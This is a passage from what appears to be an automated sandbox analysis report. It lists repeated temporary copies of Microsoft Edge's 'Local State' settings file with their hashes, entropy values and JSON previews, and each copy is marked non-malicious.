                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF20296.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF202a6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2063f.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2064f.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF22d40.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24f00.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24f10.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24f4f.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF26da4.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF26db4.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF316a6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33db6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
